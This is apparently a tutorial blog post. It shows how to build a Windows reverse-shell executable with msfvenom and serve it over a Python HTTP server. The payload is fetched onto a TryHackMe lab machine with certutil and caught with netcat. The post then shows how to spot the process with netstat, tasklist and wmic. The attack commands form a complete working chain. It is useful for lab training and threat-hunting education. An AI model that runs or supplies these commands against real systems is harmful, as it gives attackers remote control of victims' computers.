Hi, folks. In this post I would like to show you a pretty simple way to create reverse shell with msfvenom using Kali Linux machine and Windows 7 host. We will run it, establish connection from victim host and I will show you a few hints how to detect the malicious process. Let’s start!
As a target machine, I will use TryHackMe vulnerable windowsprivescarena, available for free here. Attacker machine is a Kali Linux distribution hosted on VirtualBox under Windows OS.
1. Starts victim host and connects using remote desktop as administrator TCM:
The most important information is windows host is type of x64.
2. Now, it is time to create a malicious payload. On Kali VM, open terminal and check ip configuration. I am connected throw VPN, so, provide your internet interface name:
$ ip -f inet addr show tun0 create executable with msfvenom tool, specifying target host as our Kali VM ip address and any port, ex. 8888:
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.101.124 LPORT=8888 -a x64 --platform Windows -f exe -o NothingInteresting.exe3. Now we have to delivery payload to target machine. Doing so, create a simple http server with Python3:
$ python3 -m http.server 80
4. Next, go to Windows 7 VM and download executable. I prefer using certutil tool, which is part of Windows installation:
PS> certutil -urlcache -f http://10.8.101.124/NothingInteresting.exe c:\Temp\NothingInteresting.exe
5. Back to Kali and run netcat listener on port 8888:
6. To make thing easy, I will just run executable from PowerShell.
Getting back to Kali netcat listener, we can find new connection established from target Windows 7 VM and our Kali box. This is exactly how reverse shell works! Now, we have a shell as administrator. Firewall unbale to prevent connection because of it was initiated by victim’s host.
So, nice, we have a shell. Now it is time to show you how to detect any connection established.
1. Open PowerShell or Command Prompt on Windows machine and type:
PS> netstat -naob | findstr ESTABLISHEDor use attribute -f:
PS> netstat -f
As you can see, there are two suspicious connections established with unknown host of 10.8.101.124. I know, our executable is running on 8888, so let’s check it. We have got a PID of a process running on port 8888.
2. Use tasklist command to list all tasks (/m) filtered by PID (/fi):
PS> tasklist /m /fi 'PID eq 2460'
We found malicious executable running.
3. Let’s do last check and open cmd.exe. Using Windows Management Instrumentation Console (wmic), list a parent process which has executed malicious NothingInteresting.exe:
wmic process get name,parentprocessid,processid | find "2460" 
Now we can see that the file was launched from the commandline
Above we can see how to prepare a tcp reverse shell executable using msfvenom, establish reverse shell connection and ways to hunt the malicious process. We found a process running on suspicious port and its parent process ID.
If you like with post please click a button below and I will prepare a lot more interesting topic about common tactics used by SOC hunting threats.
Be an ethical, save your privacy!